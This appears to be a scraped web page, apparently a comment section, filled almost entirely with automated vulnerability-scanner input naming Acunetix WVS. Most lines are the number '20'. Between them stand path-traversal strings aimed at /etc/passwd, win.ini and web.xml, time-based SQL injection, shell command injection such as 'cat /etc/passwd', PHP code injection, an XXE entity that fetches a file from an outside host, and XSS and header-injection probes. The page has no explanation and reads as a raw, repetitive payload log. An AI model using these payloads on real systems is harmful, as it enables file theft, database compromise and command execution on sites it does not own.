unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
27 Jun 2021
20
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
27 Jun 2021
20
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
27 Jun 2021
20
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
27 Jun 2021
20
..\..\..\..\..\..\..\..\windows\win.ini
27 Jun 2021
20
................windowswin.ini
27 Jun 2021
20
windowswin.ini
27 Jun 2021
20
../../../../../../../../../../windows/win.ini.jpg
27 Jun 2021
20
../../../../../../../../../../boot.ini
27 Jun 2021
20
../../../../../../../../../../windows/win.ini
27 Jun 2021
20
WEB-INF\web.xml
27 Jun 2021
20
WEB-INF/web.xml
27 Jun 2021
20
/\../\../\../\../\../\../\../etc/passwd
27 Jun 2021
20
file:///etc/passwd
27 Jun 2021
20
invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
27 Jun 2021
20
................etc/passwd
27 Jun 2021
20
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
27 Jun 2021
20
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
27 Jun 2021
20
/etc/passwd
27 Jun 2021
20
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
27 Jun 2021
20
/../..//../..//../..//../..//../..//etc/passwd.jpg
27 Jun 2021
20
../../../../../../../../../../etc/passwd.jpg
27 Jun 2021
20
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n
27 Jun 2021
20
../../../../../../../../../../etc/passwd.jpg
27 Jun 2021
20
../../../../../../../../../../etc/passwd.jpg
27 Jun 2021
20
fiqenhhq"; waitfor delay '0:0:5.564' --
27 Jun 2021
20
../../../../../../../../../../etc/passwd
27 Jun 2021
20
fiqenhhq'; waitfor delay '0:0:5.564' --
27 Jun 2021
20
cyhlgssh
27 Jun 2021
WEB-INF\web.xml
fiqenhhq';select pg_sleep(5.564); --
27 Jun 2021
20
fiqenhhq or (sleep(5.564)+1) limit 1 --
27 Jun 2021
Comments - (358)
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
WEB-INF\web.xml
20
20
WEB-INF/web.xml
20
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
20
20
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
20
20
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
20
20
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
20
20
20
..\..\..\..\..\..\..\..\windows\win.ini
20
................windowswin.ini
20
windowswin.ini
20
../../../../../../../../../../windows/win.ini.jpg
20
20
20
../../../../../../../../../../boot.ini
20
20
../../../../../../../../../../windows/win.ini
20
20
WEB-INF\web.xml
20
20
20
WEB-INF/web.xml
20
/\../\../\../\../\../\../\../etc/passwd
20
file:///etc/passwd
20
20
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
................etc/passwd
20
20"; waitfor delay '0:0:4.344' --
20
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
20
20'; waitfor delay '0:0:4.344' --
20
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
20
20; waitfor delay '0:0:4.344' --
/etc/passwd
20
20
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
20
20';select pg_sleep(4.344); --
20
/../..//../..//../..//../..//../..//etc/passwd.jpg
20
20;select pg_sleep(4.344); --
"|dir
20
../../../../../../../../../../etc/passwd.jpg
'|dir
20
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n
20
../../../../../../../../../../etc/passwd.jpg
20"=sleep(4.344)="
../../../../../../../../../../etc/passwd.jpg
|dir
20'=sleep(4.344)='
20
../../../../../../../../../../etc/passwd
"&dir&"
20" or (sleep(4.344)+1) limit 1 --
20
20
20' or (sleep(4.344)+1) limit 1 --
''""
20
20" and sleep(4.344)="
'&dir&'
20
'"
20' and (sleep(4.344)+1) limit 1 --
20
JyI=
20' and sleep(4.344)='
20
@@fe2q1
20
20 or (sleep(4.344)+1) limit 1 --
20
20
1xa7
20
20 and sleep(4.344)
&dir
20;901098
20
20
-1" or "79"="0
||cat /etc/passwd
20
20
";cat /etc/passwd;"
20
20
20'"()&%[removed]prompt(932486)[removed]
\
<!--
-1" or "79"="79
20
20
';cat /etc/passwd;'
20
'"
-1' or '43'='0
20
1'"
78/.
20
20
-1' or '43'='43
20
20
78
20
20
20
-1 or 92=0
20
20
20
-1 or 92=92
20
;cat /etc/passwd;
20
20
78
20
20
"|"ld
${@print(md5(acunetix_wvs_security_test))}\
20
20
'|'ld
20
20
acunetix_wvs_invalid_filename
20
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>
20
20
20
//www.acunetix.tst
20
20
20
20
${@print(md5(acunetix_wvs_security_test))}
20
20
20
20
";print(md5(acunetix_wvs_security_test));$a="
20
20
|cat /etc/passwd#
20
20
';print(md5(acunetix_wvs_security_test));$a='
20
20
20
;print(md5(acunetix_wvs_security_test));
20
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
20
`cat /etc/passwd`
20
20
20
20
20
cat /etc/passwd
20
20
"&cat /etc/passwd&"
20
20
20
20
20
20
'&cat /etc/passwd&'
20
http://testasp.vulnweb.com/t/fit.txt
20
20
&cat /etc/passwd&
20
20
20
20
20
20
20
20
20
'"\'\");|]*{ <>
20
20
http://testasp.vulnweb.com/t/xss.html?.jpg
20
20
20
20
20
20
1e309
20
20
20
20
20
20
20
..
20
20
20
20
20
'"()
20
h
20
20
20
20
^(#$!@#$)(()))******
20
20
20
20
!(()&&!|*|*|
20
testasp.vulnweb.com
268435455
20
20
)
http://testasp.vulnweb.com/t/fit.txt?.jpg
20
20
20
20
20
1some_inexistent_file_with_long_name.jpg
20
20
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
20
20
20
20
20
20&n976021=v976099
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
${99604+99141}
20
20
20
20
20
20
20
SomeCustomInjectedHeader:injected_by_wvs
20
20
SomeCustomInjectedHeader:injected_by_wvs
20
SomeCustomInjectedHeader:injected_by_wvs
"+response.write(9467264*9782369)+"
20
'+response.write(9467264*9782369)+'
20
response.write(9467264*9782369)
20
20
20
20
20
20
20
20
20